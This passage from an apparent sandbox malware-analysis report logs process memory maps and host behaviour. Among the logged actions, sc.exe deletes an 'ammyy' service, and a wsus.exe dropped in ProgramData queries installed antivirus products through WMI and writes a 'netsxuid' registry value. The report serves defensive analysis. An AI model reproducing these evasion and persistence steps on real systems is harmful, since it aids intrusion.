| samcli.dll | 0x73e70000 | 0x73e7efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| browcli.dll | 0x73e80000 | 0x73e8cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netutils.dll | 0x74bb0000 | 0x74bb8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74d90000 | 0x74debfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x74df0000 | 0x74e2efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74e50000 | 0x74e57fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x75120000 | 0x7512bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x75130000 | 0x7518ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x75290000 | 0x752d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x75440000 | 0x7554ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x75670000 | 0x75675fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x75900000 | 0x759abfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x75cc0000 | 0x75cf4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x76e20000 | 0x76e38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x76f00000 | 0x76feffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x77130000 | 0x771cffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000771d0000 | 0x771d0000 | 0x772c9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000772d0000 | 0x772d0000 | 0x773eefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x773f0000 | 0x77598fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x775d0000 | 0x7774ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
4 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_ERROR_HANDLE | size = 30 |
|
1 | |
| Write | STD_ERROR_HANDLE | size = 2 |
|
2 | |
| Write | STD_ERROR_HANDLE | size = 52 |
|
1 |
Module (3)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | NETMSG | base_address = 0x73d90000 |
|
1 | |
| Get Handle | c:\windows\syswow64\net1.exe | base_address = 0x80000 |
|
1 | |
| Get Filename | - | process_name = c:\windows\syswow64\net1.exe, file_name_orig = C:\Windows\SysWOW64\net1.exe, size = 260 |
|
1 |
Service (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Service Name | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-02 21:37:13 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10927246 |
|
1 |
Process #19: sc.exe
8
0
| Information | Value |
|---|---|
| ID | #19 |
| File Name | c:\windows\syswow64\sc.exe |
| Command Line | sc delete ammyy |
| Initial Working Directory | C:\Users\qj4SUKboE\Desktop\ |
| Monitor | Start Time: 00:01:14, Reason: Child Process |
| Unmonitor | End Time: 00:02:38, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:24 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb64 |
| Parent PID | 0xb7c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | EXB9WSP\qj4SUKboE |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B70
0x
620
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| sc.exe | 0x00030000 | 0x0003bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000040000 | 0x00040000 | 0x00041fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00046fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| apisetschema.dll | 0x00050000 | 0x00050fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00063fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00070fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00080000 | 0x000e6fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x000f1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| sc.exe.mui | 0x00100000 | 0x0010ffff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x0000000000120000 | 0x00120000 | 0x0015ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x0021ffff | Private Memory | Readable, Writable |
|
|
|
- |
| kernelbase.dll.mui | 0x00220000 | 0x002dffff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x0031ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x0043ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000005e0000 | 0x005e0000 | 0x006dffff | Private Memory | Readable, Writable |
|
|
|
- |
| wow64win.dll | 0x74d90000 | 0x74debfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x74df0000 | 0x74e2efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74e50000 | 0x74e57fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x75120000 | 0x7512bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x75130000 | 0x7518ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x75290000 | 0x752d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x75440000 | 0x7554ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x75900000 | 0x759abfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x76e20000 | 0x76e38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x76f00000 | 0x76feffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x77130000 | 0x771cffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000771d0000 | 0x771d0000 | 0x772c9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000772d0000 | 0x772d0000 | 0x773eefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x773f0000 | 0x77598fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x775d0000 | 0x7774ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Host Behavior
File (3)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 98 |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\sc.exe | base_address = 0x30000 |
|
1 |
Service (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-02 21:37:13 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10927074 |
|
1 |
Process #21: wsus.exe
2687
7
| Information | Value |
|---|---|
| ID | #21 |
| File Name | c:\programdata\settings\wsus.exe |
| Command Line | C:\ProgramData\Settings\wsus.exe |
| Initial Working Directory | C:\Users\qj4SUKboE\Desktop\ |
| Monitor | Start Time: 00:01:25, Reason: Child Process |
| Unmonitor | End Time: 00:02:38, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:13 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa40 |
| Parent PID | 0x814 (c:\users\qj4suk~1\appdata\local\temp\cmd_.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | EXB9WSP\qj4SUKboE |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A50
0x
B30
0x
B44
0x
8E0
0x
8C8
0x
8DC
0x
0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wsus.exe | 0x00050000 | 0x000fcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000100000 | 0x00100000 | 0x00103fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000110000 | 0x00110000 | 0x00110fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00120000 | 0x00186fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x001cffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x002dffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000002e0000 | 0x002e0000 | 0x002e0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| rsaenh.dll | 0x002f0000 | 0x0032bfff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0036ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x003cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x0040ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000440000 | 0x00440000 | 0x004bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000004c0000 | 0x004c0000 | 0x004fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000570000 | 0x00570000 | 0x005affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x0071ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000720000 | 0x00720000 | 0x008a7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000008b0000 | 0x008b0000 | 0x00a30fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000a40000 | 0x00a40000 | 0x01e3ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x01e40000 | 0x0210efff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002110000 | 0x02110000 | 0x0228ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002110000 | 0x02110000 | 0x021eefff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002250000 | 0x02250000 | 0x0228ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002290000 | 0x02290000 | 0x0238ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000023a0000 | 0x023a0000 | 0x0249ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000024a0000 | 0x024a0000 | 0x025dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000024a0000 | 0x024a0000 | 0x0259ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000025a0000 | 0x025a0000 | 0x025dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000025e0000 | 0x025e0000 | 0x026affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000025e0000 | 0x025e0000 | 0x0261ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002670000 | 0x02670000 | 0x026affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002790000 | 0x02790000 | 0x0288ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000028c0000 | 0x028c0000 | 0x028fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002900000 | 0x02900000 | 0x029fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002af0000 | 0x02af0000 | 0x02beffff | Private Memory | Readable, Writable |
|
|
|
- |
| wtsapi32.dll | 0x736f0000 | 0x736fcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dbghelp.dll | 0x73700000 | 0x737eafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| userenv.dll | 0x737f0000 | 0x73806fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winscard.dll | 0x73810000 | 0x73832fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| secur32.dll | 0x73840000 | 0x73847fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| fastprox.dll | 0x73fa0000 | 0x74035fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rsaenh.dll | 0x74040000 | 0x7407afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wbemcomn.dll | 0x74080000 | 0x740dbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winsta.dll | 0x740b0000 | 0x740d8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdsapi.dll | 0x74bb0000 | 0x74bc7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x74bd0000 | 0x74bdafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dwmapi.dll | 0x74cf0000 | 0x74d02fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| uxtheme.dll | 0x74d10000 | 0x74d8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74d90000 | 0x74debfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x74df0000 | 0x74e2efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x74e40000 | 0x74e42fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74e50000 | 0x74e57fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wbemsvc.dll | 0x74e70000 | 0x74e7efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrtremote.dll | 0x74e80000 | 0x74e8dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x75060000 | 0x75075fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wbemprox.dll | 0x75080000 | 0x75089fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wshtcpip.dll | 0x75090000 | 0x75094fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mswsock.dll | 0x750a0000 | 0x750dbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kbdus.dll | 0x750d0000 | 0x750d3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x75120000 | 0x7512bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x75130000 | 0x7518ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x75290000 | 0x752d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75300000 | 0x753cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x753e0000 | 0x75436fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x75440000 | 0x7554ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x75670000 | 0x75675fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clbcatq.dll | 0x75820000 | 0x758a2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x75900000 | 0x759abfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x75c30000 | 0x75cbefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x75cc0000 | 0x75cf4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75d10000 | 0x75e0ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75e10000 | 0x75e9ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x75ea0000 | 0x75f3cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x75f40000 | 0x7609bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x760a0000 | 0x760a9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x76140000 | 0x76d89fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x76dc0000 | 0x76e1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x76e20000 | 0x76e38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x76f00000 | 0x76feffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x77130000 | 0x771cffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000771d0000 | 0x771d0000 | 0x772c9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000772d0000 | 0x772d0000 | 0x773eefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x773f0000 | 0x77598fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x775d0000 | 0x7774ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Host Behavior
COM (3)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | WBEMLocator | IWbemLocator | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Execute | WBEMLocator | IWbemLocator | method_name = ConnectServer, network_resource = root\SecurityCenter2 |
|
1 | |
| Execute | WBEMLocator | IWbemServices | method_name = ExecQuery, query_language = WQL, query = SELECT * FROM AntiVirusProduct |
|
1 |
File (6)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | KFwsh6767yuhNr3hunjiweh78&*$Y%3uefisgt67yuH*y#$urw | share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Create | C:\ProgramData\Settings\wsus.exe | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Read | C:\ProgramData\Settings\wsus.exe | size = 1024, size_out = 1024 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Control | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Control | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Control | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services | value_name = netsxuid, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Control | value_name = netsxuid, data = 0 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services | value_name = netsxuid, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Control | value_name = netsxuid, data = 53 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | value_name = EnableLUA, data = 1 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services | value_name = netsxuid, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Control | value_name = netsxuid, data = 53 |
|
1 | |
| Write Value | HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Control | value_name = netsxuid, data = 52393308, size = 8, type = REG_SZ |
|
1 |
Module (83)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | api-ms-win-core-synch-l1-2-0 | base_address = 0x0 |
|
2 | |
| Load | api-ms-win-core-synch-l1-2-0 | base_address = 0x74e40000 |
|
2 | |
| Load | api-ms-win-core-fibers-l1-1-1 | base_address = 0x0 |
|
4 | |
| Load | kernel32 | base_address = 0x0 |
|
2 | |
| Load | kernel32 | base_address = 0x75440000 |
|
3 | |
| Load | api-ms-win-core-localization-l1-2-1 | base_address = 0x0 |
|
2 | |
| Load | - | base_address = 0x0 |
|
2 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75440000 |
|
4 | |
| Get Handle | c:\windows\syswow64\ntdll.dll | base_address = 0x775d0000 |
|
1 | |
| Get Filename | api-ms-win-core-localization-l1-2-1 | process_name = c:\programdata\settings\wsus.exe, file_name_orig = C:\ProgramData\Settings\wsus.exe, size = 260 |
|
1 | |
| Get Filename | - | process_name = c:\programdata\settings\wsus.exe, file_name_orig = C:\ProgramData\Settings\wsus.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\api-ms-win-core-synch-l1-2-0.dll | address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x75454f2b |
|
3 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75454208 |
|
3 | |
| Get Address | c:\windows\syswow64\api-ms-win-core-synch-l1-2-0.dll | function = InitializeCriticalSectionEx, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75451252 |
|
3 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x754d47f1 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7545359f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75454d28 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitOnceExecuteOnce, address_out = 0x7546d627 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x754d410b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreW, address_out = 0x7546ca5a |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x754d4195 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7546ee7e |
|
1 | |
